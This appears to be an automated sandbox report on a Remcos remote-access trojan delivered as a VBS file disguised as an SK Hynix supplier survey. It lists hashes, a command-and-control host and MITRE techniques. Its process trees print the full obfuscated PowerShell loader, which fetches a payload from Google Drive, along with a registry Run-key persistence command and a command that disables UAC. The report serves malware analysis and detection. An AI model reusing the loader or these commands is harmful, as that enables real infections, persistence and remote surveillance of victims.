remcos | ce47d649ae973ea63f08e678367e58a90fdda8304e1ca930b232dcb1ea29784e

General

Target

[SK하이닉스 ] 2024년 하반기 협력사 예비조사표.vbs
Size

15KB
MD5

ecdc2bdc4b6797e46ba636a37e9f4dc9
SHA1

46c1326fcad9f2081169a8e204108d9987d3140b
SHA256

aa39f9573531ad0822df9283582e801e104119339b4bc9553feac79f4c9da435
SHA512

323da981a911a54bfeb56e76a0cd8899c74dbce07682f381f9ea3974b8f5c1a2a3c4563feabf67085da5317b69216e3beefad16b7cb1b357eae46f6faaf399ed
SSDEEP

384:8aEIukP7IsT0LanTOfEia9SLFrA3BY99uN7yrkC:BBTIsguTOfi9SRrIY3ubC

Score

10^/10

remcos remotehost discovery evasion execution persistence rat trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

xmrhgsptl.ddns.net:47392

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-84A707
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Blocklisted process makes network request 8 IoCs

Processes:

WScript.exepowershell.exemsiexec.exe

flow	pid	Process
4	1148	WScript.exe
8	4616	powershell.exe
10	4616	powershell.exe
37	3768	msiexec.exe
39	3768	msiexec.exe
41	3768	msiexec.exe
43	3768	msiexec.exe
44	3768	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Doubtably% -windowstyle 1 $Normalstrrelsernes=(gp -Path 'HKCU:\\Software\\Frondescent48\\').servoed;%Doubtably% ($Normalstrrelsernes)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
4616	powershell.exe
4940	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
7	drive.google.com
8	drive.google.com
37	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid	Process
3768	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
4940	powershell.exe
3768	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exereg.exepowershell.exemsiexec.execmd.exereg.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exe

pid	Process
2620	reg.exe
4452	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
4616	powershell.exe
4616	powershell.exe
4940	powershell.exe
4940	powershell.exe
4940	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid	Process
4940	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	4940	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.execmd.exe

description	pid	Process	procid_target
PID 1148 wrote to memory of 4616	1148	WScript.exe	83
PID 1148 wrote to memory of 4616	1148	WScript.exe	83
PID 4940 wrote to memory of 3768	4940	powershell.exe	98
PID 4940 wrote to memory of 3768	4940	powershell.exe	98
PID 4940 wrote to memory of 3768	4940	powershell.exe	98
PID 4940 wrote to memory of 3768	4940	powershell.exe	98
PID 3768 wrote to memory of 3132	3768	msiexec.exe	100
PID 3768 wrote to memory of 3132	3768	msiexec.exe	100
PID 3768 wrote to memory of 3132	3768	msiexec.exe	100
PID 3132 wrote to memory of 2620	3132	cmd.exe	102
PID 3132 wrote to memory of 2620	3132	cmd.exe	102
PID 3132 wrote to memory of 2620	3132	cmd.exe	102
PID 3768 wrote to memory of 4952	3768	msiexec.exe	103
PID 3768 wrote to memory of 4952	3768	msiexec.exe	103
PID 3768 wrote to memory of 4952	3768	msiexec.exe	103
PID 4952 wrote to memory of 4452	4952	cmd.exe	105
PID 4952 wrote to memory of 4452	4952	cmd.exe	105
PID 4952 wrote to memory of 4452	4952	cmd.exe	105

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\[SK하이닉스 ] 2024년 하반기 협력사 예비조사표.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Registrerapparaters Vildtreservatets Untrue Yderbanes Tamaraus Rislendes #><#Rygskstativ Fiskeskippere Uanmodedes #>$Udvisningsordren='Forskningsledere';function Bjergvrks($Gamblerne){If ($host.DebuggerEnabled) {$Brsspekulationen=4} for ($Latinamerikaneres=$Brsspekulationen;;$Latinamerikaneres+=5){if(!$Gamblerne[$Latinamerikaneres]) { break }$Paraderer+=$Gamblerne[$Latinamerikaneres]}$Paraderer}function Leukosens($Latinamerikaneresiasa){ .($Klbemrke) ($Latinamerikaneresiasa)}$Skogbolite=Bjergvrks 'ElecnGejseBracT Veg. atcWHaemESkrmbStorCLubrL aabi SpueNonoN icat';$Regerer191=Bjergvrks ' AfvMSej o ParzJy li VarlNectl G aaTrau/';$Skriftsted124=Bjergvrks 'SuppT InflVanssSam 1B li2';$kontantprisernes=' Tu,[BussN.tcheSqu,tRefl.Ex.osv,reepuncrUnyivMblei DinCCoune un p,vadoPeruiBen,Nesc TAntim eraDukkNDentAAsphg JorETildrbr.v]fo,h:Lewd:SangsTotaEPletcRetsuEgepR PegIIg aTUnbiyRyn,PP ucr ForoPopiT AmoOSycoc RarOAvoiLToil=Svan$ TroSHistkBlovR I oI ollFHarbTElves rd.tLukrEFlj,d rd1Raa 2 ,en4';$Regerer191+=Bjergvrks 'cure5 Tor.Tils0 An. I,lu(EncoWPeleiRaj nMuskdV.dlo,istw trsUd.s QuanN ExuTMic Paro1Dis 0Oplr.Frat0Bovo;guld BerrWSagnihjrenSi k6 Ud 4 urn;Just PearxPref6Frem4henv; mme PandrP mav,ord: L s1Vare3Kuwa1U as.Okse0 C,u) H,v drG.ommeZooscRefok SjioSarg/Be o2Welk0 Lik1Grae0Hard0A ol1star0 ull1ac n FooF estiNoncr.vereKabafMilloOrdrxFo l/Mat 1Outs3Bran1 Tan.R.ce0';$Denazification=Bjergvrks 'AngluResesSubrENoncrAnbe-AnneAhirgGBymiEOxfoNGutsT';$Aureously=Bjergvrks ' Kldh R ttOmb.t Su,pMartsMeni:Spee/Pala/NikodFolkr Mo iBegrv.araeLrer.,orngRaptoVgteo T.ig acrl U geDist.Uvorc ,neoLozemAnim/CenouOvercSubd?FolkeAnomxKastp HoroTt.irN bet Rek=ElepdBes oIsolw.ursn UnglBe soj.leaMo,ndKoll&K,eriAlv dOrni=Bilm1Naut7 ArahdeciiUrceuOverlNedkZPjalx konJPl.s-Vandx tmovAgonaSmkkyShriY Te WSurpQA.kiQ omcR,ddh BajBNeurQ utcYVk,ewExostTimeGSe vcUdg.KD.bbF AutyTypev N dIT isV';$Katalepsi=Bjergvrks 'Folk>';$Klbemrke=Bjergvrks 'UndeiSatiENaphX';$Rektangelet='underholdshjlp';$Callas='\Dreamers.Lan';Leukosens (Bjergvrks 'Empr$KopiGs,ndlCa.poAfdeBTenoaNe vLMisf:,oryhBleuah stPScletHenrEWaggr UnleTr c2Jirk0 Rud6 Bu =Roma$FlacEPhosN ModvUtaa:FlasARai p,runpLangDSeraA IrrtSlotA Inc+satr$Qua CRep A .orLfourLudkoA HogS');Leukosens (Bjergvrks ' Ulm$WeargMeteLOp ro Pr bPro.ANumbLH gg: Mons Sk itilkK StnKGor E GodRPicohTaiseDisoDDigeSR,tsGIrvir iofa.eridD abeEj rnSvovsde t=Acti$KntraMedkUAadsRVolleGramO ArvuSk,bS nwlBookYV nl.EgocsUr kPR koLKmp I NebtFibr(flet$Chaok ,oraF igT UniaB reLCigaEFeltPOsmoSStnkI Top)');Leukosens (Bjergvrks $kontantprisernes);$Aureously=$Sikkerhedsgradens[0];$Popularizer=(Bjergvrks 'D bd$UnergWagoLUdplod gdbKa oASm lLResb:DextE AttkOutwSAntikTim L Dicu FlisCaliiMjeaVB,llITydeTUndrEAfs TImagEGl sNSe i=Subcn UncE ndew Ell-AdeloLuckb SpiJ TjrE PyecGipstSkep FdeSSmutY FlaSBipotPhyteSkygM Kic.Ifal$ k.rsbndekClawO R cG TilbPol OBillLStnkiF,rhT yoee');Leukosens ($Popularizer);Leukosens (Bjergvrks 'Ratt$Ope E,onfkAcros,ntukT.anlSpinuXenosP shiSacrvM thiEpittGrateModette reSqu nVari.DecoH iseStuda S.odAfhne udlrPirasDan [Jigg$ Rd DPho eT,nkn CytaI htzSp eiTalkfUndeiSeencBopla SjltBra isteeoD cenG mn]Mask=Proc$cereRE saeLissg aleDoggrBungeTu arCatt1Dela9Co c1');$Tripelalliancens=Bjergvrks 'Havg$I laEPizzk PyosAt ekAbatlUdvauJ,wpspolyiskulvOrgaiSt.wtS ore C rtRelae tan nco.BelaD MikoOprewG oun PiqlHen o E aa Pi.dPremFSasii DislFangeBars(Misq$Fo fACulduSpgerSnneeinsuoAfspuMegasvugglMiliyToxi, nt$FugiMCephaCompr EtekKalde Vibt T kpInf lPsalaRosecAutoevkst)';$Marketplace=$Haptere206;Leukosens (Bjergvrks ' dfa$TrreGMiaoljok,o atobL tkaSttylMono:.tvbpSu,cRGynaECentSMa rEMod,RReptvSupeaunmaTpolao ,arRArt.YSypi=Mi f(StavT EfreEjersHexotOct -FiskpmultARep,t yraH,dde ly e$ElevMMercAFa.mRKlimKFe.te EnftCocap PtoL ChiaAfmaC Pe E lat)');while (!$Preservatory) {Leukosens (Bjergvrks 'Patr$ Preg Skilaffao B lbE glaWanilflis:pompBVensaadopaSnigd OvosNonrm H raKip,nSnardG ves Ty pAdmiiRakebnonoeReacrQuars gte= Li $CiviBc.esrProfoRedatFesthCrayeObterB tyeSphid') ;Leukosens $Tripelalliancens;Leukosens (Bjergvrks 'PolysRepaT veraM sdrdrflt Lap-DeemspoldlaareELillE RhePPati f,rc4');Leukosens (Bjergvrks 'Aand$Tabeg ejelPuzzoLandbRaadADriflBio,:K,igpElsaRSuboE ArgsC ndEBeslrSch VPar A MantMo.poUnspR Gy.YArch=.top( hinTspawe ModsHandtF.rs-FortpPo aA spT U.oHU be D ng$ Mesm L,nA gneRSognKRaadEPhonT Un.pMonoLRetoa etocS.ukEF rd)') ;Leukosens (Bjergvrks 'Temp$Soa.GAnthl F noAfrebMosaAmrkelRepr:Oph BPlebrShotnEvaleExc l Nato ,hrkBestK,onse onrLande Bet= Una$YawpGTempL.caloBasebSankAkon lbeor:LegaS rbeuUnlinstr dSubchUndeee codDeflsPhthPKooroFrusL eptILoxitVin.iN tuSPsycKSlot+Spal+ ,ve%Demy$AutosPraeIForkKSndaKAk uEPourrLivsHAf aeHo,kdScarSZeisgBradrbimea apod Skae repNgangSUnri. IndcI,inoConnu D.snfor T') ;$Aureously=$Sikkerhedsgradens[$Brnelokkere]}$Otiant24=284090;$Bouillonen=30480;Leukosens (Bjergvrks 'Roco$E cagP ralFranoForuBKlasA ,diLC mi:StiveSpe ADvehr BlatD sshHi diAleuN P.aEVitasYeniS Pol .omb= Pre FastGMuseEQua t adb-BegrCOrohOvverndrmmTAutoE Sk.nF.ertLi.e Moms$PsycM SheaLamprDet KGadeeSemiTMe.aPBalaLNonaaflowCGuide');Leukosens (Bjergvrks 'Wors$Sulpg SinlCeliojerkbBar.aUranlpriv:pancSSisstStyleBrinnOversAfl tShivoSiber B,tmC vi Ae,=Appe Squ[Tu,mSDispyHys.s Alet KraePorkm.bdi.FremCsy soDehonLednvS eke AflrD mitgenn]Katt:Regn: Bi FDeiprKontoKemim MarBGuldaTrads asseball6Bred4M noS armt RedrFjeliNoncnDuf gunte(Anal$ IstE an aSmidrMud tKalkh SeniBaccn emte HersVitis.ire)');Leukosens (Bjergvrks 'Vari$ dlG UnclMewlo ilfBStddAextrLSe d:TentEKo,ogBlace DistS.miFUpsmOCanuRBoksbS ndRMinduJ vigSata Gobo=Depo Udpo[TrilSWhisYudposfluaT SkaEBrugMNonn. UdmtP beeBlunX KorTOpla.ErobE BabNauthCKe.lO pytdSydyiR.senLndeG ele]Send:Fejl:Em,cAUf rSAgerCbnhrISrgeiFrem.CannGFauseTussTNervsDeceT RebR Maxi H ln BurgNeur( es$MarjS nasT WooeAtteNDrbtSRetsT argo.torrCobbMScu )');Leukosens (Bjergvrks ' ud,$Ved GUndelForuoStnkBSlj AHardLBour:,ndkKFarlOPhiamContpKageoTektNOpsle ma.NGenitBechA Un,nWushaDummlBelfyAksiSStenE.ator esnUbeteAmyx=Bopl$RanueVerdg EmbeSpuftSemifFascO Itar An B onRCoinuBuf g Cys. BilsVilkU SchB obsSlettTeo r Laai ypoN etrgMat (W od$ZariOGypst RepIA paAUnatNRn,eTEn,o2Ha.n4,ont,Matr$ G,aBDudlo MinuMur IUndeLOv.rlUdr O.cytn Ca.e BenNsvej)');Leukosens $Komponentanalyserne;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4616

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Registrerapparaters Vildtreservatets Untrue Yderbanes Tamaraus Rislendes #><#Rygskstativ Fiskeskippere Uanmodedes #>$Udvisningsordren='Forskningsledere';function Bjergvrks($Gamblerne){If ($host.DebuggerEnabled) {$Brsspekulationen=4} for ($Latinamerikaneres=$Brsspekulationen;;$Latinamerikaneres+=5){if(!$Gamblerne[$Latinamerikaneres]) { break }$Paraderer+=$Gamblerne[$Latinamerikaneres]}$Paraderer}function Leukosens($Latinamerikaneresiasa){ .($Klbemrke) ($Latinamerikaneresiasa)}$Skogbolite=Bjergvrks 'ElecnGejseBracT Veg. atcWHaemESkrmbStorCLubrL aabi SpueNonoN icat';$Regerer191=Bjergvrks ' AfvMSej o ParzJy li VarlNectl G aaTrau/';$Skriftsted124=Bjergvrks 'SuppT InflVanssSam 1B li2';$kontantprisernes=' Tu,[BussN.tcheSqu,tRefl.Ex.osv,reepuncrUnyivMblei DinCCoune un p,vadoPeruiBen,Nesc TAntim eraDukkNDentAAsphg JorETildrbr.v]fo,h:Lewd:SangsTotaEPletcRetsuEgepR PegIIg aTUnbiyRyn,PP ucr ForoPopiT AmoOSycoc RarOAvoiLToil=Svan$ TroSHistkBlovR I oI ollFHarbTElves rd.tLukrEFlj,d rd1Raa 2 ,en4';$Regerer191+=Bjergvrks 'cure5 Tor.Tils0 An. I,lu(EncoWPeleiRaj nMuskdV.dlo,istw trsUd.s QuanN ExuTMic Paro1Dis 0Oplr.Frat0Bovo;guld BerrWSagnihjrenSi k6 Ud 4 urn;Just PearxPref6Frem4henv; mme PandrP mav,ord: L s1Vare3Kuwa1U as.Okse0 C,u) H,v drG.ommeZooscRefok SjioSarg/Be o2Welk0 Lik1Grae0Hard0A ol1star0 ull1ac n FooF estiNoncr.vereKabafMilloOrdrxFo l/Mat 1Outs3Bran1 Tan.R.ce0';$Denazification=Bjergvrks 'AngluResesSubrENoncrAnbe-AnneAhirgGBymiEOxfoNGutsT';$Aureously=Bjergvrks ' Kldh R ttOmb.t Su,pMartsMeni:Spee/Pala/NikodFolkr Mo iBegrv.araeLrer.,orngRaptoVgteo T.ig acrl U geDist.Uvorc ,neoLozemAnim/CenouOvercSubd?FolkeAnomxKastp HoroTt.irN bet Rek=ElepdBes oIsolw.ursn UnglBe soj.leaMo,ndKoll&K,eriAlv dOrni=Bilm1Naut7 ArahdeciiUrceuOverlNedkZPjalx konJPl.s-Vandx tmovAgonaSmkkyShriY Te WSurpQA.kiQ omcR,ddh BajBNeurQ utcYVk,ewExostTimeGSe vcUdg.KD.bbF AutyTypev N dIT isV';$Katalepsi=Bjergvrks 'Folk>';$Klbemrke=Bjergvrks 'UndeiSatiENaphX';$Rektangelet='underholdshjlp';$Callas='\Dreamers.Lan';Leukosens (Bjergvrks 'Empr$KopiGs,ndlCa.poAfdeBTenoaNe vLMisf:,oryhBleuah stPScletHenrEWaggr UnleTr c2Jirk0 Rud6 Bu =Roma$FlacEPhosN ModvUtaa:FlasARai p,runpLangDSeraA IrrtSlotA Inc+satr$Qua CRep A .orLfourLudkoA HogS');Leukosens (Bjergvrks ' Ulm$WeargMeteLOp ro Pr bPro.ANumbLH gg: Mons Sk itilkK StnKGor E GodRPicohTaiseDisoDDigeSR,tsGIrvir iofa.eridD abeEj rnSvovsde t=Acti$KntraMedkUAadsRVolleGramO ArvuSk,bS nwlBookYV nl.EgocsUr kPR koLKmp I NebtFibr(flet$Chaok ,oraF igT UniaB reLCigaEFeltPOsmoSStnkI Top)');Leukosens (Bjergvrks $kontantprisernes);$Aureously=$Sikkerhedsgradens[0];$Popularizer=(Bjergvrks 'D bd$UnergWagoLUdplod gdbKa oASm lLResb:DextE AttkOutwSAntikTim L Dicu FlisCaliiMjeaVB,llITydeTUndrEAfs TImagEGl sNSe i=Subcn UncE ndew Ell-AdeloLuckb SpiJ TjrE PyecGipstSkep FdeSSmutY FlaSBipotPhyteSkygM Kic.Ifal$ k.rsbndekClawO R cG TilbPol OBillLStnkiF,rhT yoee');Leukosens ($Popularizer);Leukosens (Bjergvrks 'Ratt$Ope E,onfkAcros,ntukT.anlSpinuXenosP shiSacrvM thiEpittGrateModette reSqu nVari.DecoH iseStuda S.odAfhne udlrPirasDan [Jigg$ Rd DPho eT,nkn CytaI htzSp eiTalkfUndeiSeencBopla SjltBra isteeoD cenG mn]Mask=Proc$cereRE saeLissg aleDoggrBungeTu arCatt1Dela9Co c1');$Tripelalliancens=Bjergvrks 'Havg$I laEPizzk PyosAt ekAbatlUdvauJ,wpspolyiskulvOrgaiSt.wtS ore C rtRelae tan nco.BelaD MikoOprewG oun PiqlHen o E aa Pi.dPremFSasii DislFangeBars(Misq$Fo fACulduSpgerSnneeinsuoAfspuMegasvugglMiliyToxi, nt$FugiMCephaCompr EtekKalde Vibt T kpInf lPsalaRosecAutoevkst)';$Marketplace=$Haptere206;Leukosens (Bjergvrks ' dfa$TrreGMiaoljok,o atobL tkaSttylMono:.tvbpSu,cRGynaECentSMa rEMod,RReptvSupeaunmaTpolao ,arRArt.YSypi=Mi f(StavT EfreEjersHexotOct -FiskpmultARep,t yraH,dde ly e$ElevMMercAFa.mRKlimKFe.te EnftCocap PtoL ChiaAfmaC Pe E lat)');while (!$Preservatory) {Leukosens (Bjergvrks 'Patr$ Preg Skilaffao B lbE glaWanilflis:pompBVensaadopaSnigd OvosNonrm H raKip,nSnardG ves Ty pAdmiiRakebnonoeReacrQuars gte= Li $CiviBc.esrProfoRedatFesthCrayeObterB tyeSphid') ;Leukosens $Tripelalliancens;Leukosens (Bjergvrks 'PolysRepaT veraM sdrdrflt Lap-DeemspoldlaareELillE RhePPati f,rc4');Leukosens (Bjergvrks 'Aand$Tabeg ejelPuzzoLandbRaadADriflBio,:K,igpElsaRSuboE ArgsC ndEBeslrSch VPar A MantMo.poUnspR Gy.YArch=.top( hinTspawe ModsHandtF.rs-FortpPo aA spT U.oHU be D ng$ Mesm L,nA gneRSognKRaadEPhonT Un.pMonoLRetoa etocS.ukEF rd)') ;Leukosens (Bjergvrks 'Temp$Soa.GAnthl F noAfrebMosaAmrkelRepr:Oph BPlebrShotnEvaleExc l Nato ,hrkBestK,onse onrLande Bet= Una$YawpGTempL.caloBasebSankAkon lbeor:LegaS rbeuUnlinstr dSubchUndeee codDeflsPhthPKooroFrusL eptILoxitVin.iN tuSPsycKSlot+Spal+ ,ve%Demy$AutosPraeIForkKSndaKAk uEPourrLivsHAf aeHo,kdScarSZeisgBradrbimea apod Skae repNgangSUnri. IndcI,inoConnu D.snfor T') ;$Aureously=$Sikkerhedsgradens[$Brnelokkere]}$Otiant24=284090;$Bouillonen=30480;Leukosens (Bjergvrks 'Roco$E cagP ralFranoForuBKlasA ,diLC mi:StiveSpe ADvehr BlatD sshHi diAleuN P.aEVitasYeniS Pol .omb= Pre FastGMuseEQua t adb-BegrCOrohOvverndrmmTAutoE Sk.nF.ertLi.e Moms$PsycM SheaLamprDet KGadeeSemiTMe.aPBalaLNonaaflowCGuide');Leukosens (Bjergvrks 'Wors$Sulpg SinlCeliojerkbBar.aUranlpriv:pancSSisstStyleBrinnOversAfl tShivoSiber B,tmC vi Ae,=Appe Squ[Tu,mSDispyHys.s Alet KraePorkm.bdi.FremCsy soDehonLednvS eke AflrD mitgenn]Katt:Regn: Bi FDeiprKontoKemim MarBGuldaTrads asseball6Bred4M noS armt RedrFjeliNoncnDuf gunte(Anal$ IstE an aSmidrMud tKalkh SeniBaccn emte HersVitis.ire)');Leukosens (Bjergvrks 'Vari$ dlG UnclMewlo ilfBStddAextrLSe d:TentEKo,ogBlace DistS.miFUpsmOCanuRBoksbS ndRMinduJ vigSata Gobo=Depo Udpo[TrilSWhisYudposfluaT SkaEBrugMNonn. UdmtP beeBlunX KorTOpla.ErobE BabNauthCKe.lO pytdSydyiR.senLndeG ele]Send:Fejl:Em,cAUf rSAgerCbnhrISrgeiFrem.CannGFauseTussTNervsDeceT RebR Maxi H ln BurgNeur( es$MarjS nasT WooeAtteNDrbtSRetsT argo.torrCobbMScu )');Leukosens (Bjergvrks ' ud,$Ved GUndelForuoStnkBSlj AHardLBour:,ndkKFarlOPhiamContpKageoTektNOpsle ma.NGenitBechA Un,nWushaDummlBelfyAksiSStenE.ator esnUbeteAmyx=Bopl$RanueVerdg EmbeSpuftSemifFascO Itar An B onRCoinuBuf g Cys. BilsVilkU SchB obsSlettTeo r Laai ypoN etrgMat (W od$ZariOGypst RepIA paAUnatNRn,eTEn,o2Ha.n4,ont,Matr$ G,aBDudlo MinuMur IUndeLOv.rlUdr O.cytn Ca.e BenNsvej)');Leukosens $Komponentanalyserne;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Doubtably% -windowstyle 1 $Normalstrrelsernes=(gp -Path 'HKCU:\Software\Frondescent48\').servoed;%Doubtably% ($Normalstrrelsernes)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3132
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Doubtably% -windowstyle 1 $Normalstrrelsernes=(gp -Path 'HKCU:\Software\Frondescent48\').servoed;%Doubtably% ($Normalstrrelsernes)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:2620
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4952
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Impair Defenses

1

T1562

Disable or Modify Tools

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
dc9e3efa3c102c1364f24271c5d56bd2

SHA1
d54ef45b5ee7539e17dff97d929722214217fb0d

SHA256
fbc856ba7174ec5fa3e0ea93d4249e0f7ad5cebad33742b4c96288218c59693e

SHA512
3376ba5918ae777e02e2ec55051f68f88ae0432e4edf45d516ce1e22901befaf207b722a0083292fe08060c50803e1649b00620ee4146d75fe51d9f0d14ac8cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
529dda9e310bdfbbef81ba36b6f34aed

SHA1
bcf6cd2e43071bcf87214c7d8c88b12d8efcd1ad

SHA256
1f9bb45cc7b3ffd0b578b6c1a809fefbd16e65398610b4975f8e2a555526bbba

SHA512
72cba79521577bbc44f7fbfb59799314dc6f63d57c910ac455a8ab9f0a418766d8c7c704087b1bef525323043ab8f04331d9874ec37fb786c0876a32c9ecad31

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ovwrtnfd.a1e.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Dreamers.Lan

Filesize
409KB

MD5
e8e8f70630d0ed255ba5c4c8c8f93357

SHA1
7fd44450794ef2830c908f8ea0fe62759af9ed87

SHA256
ed5fe0a58461eccceabf20e95fe744b74f1455842b3ea325c1f7fa01e0649d0d

SHA512
45a3c10a2282a7d151afa5120ebff15f944fe492e7f51af93dcfc163f06c8f4bd8a4ed90b1ef6d1ca71310951690ed5e12b9175213c72eabf983bde3b3192cf1

Download Submit
memory/3768-63-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/3768-64-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/4616-15-0x00007FFCA5430000-0x00007FFCA5EF1000-memory.dmp

Filesize
10.8MB

Download
memory/4616-21-0x00007FFCA5430000-0x00007FFCA5EF1000-memory.dmp

Filesize
10.8MB

Download
memory/4616-24-0x00007FFCA5430000-0x00007FFCA5EF1000-memory.dmp

Filesize
10.8MB

Download
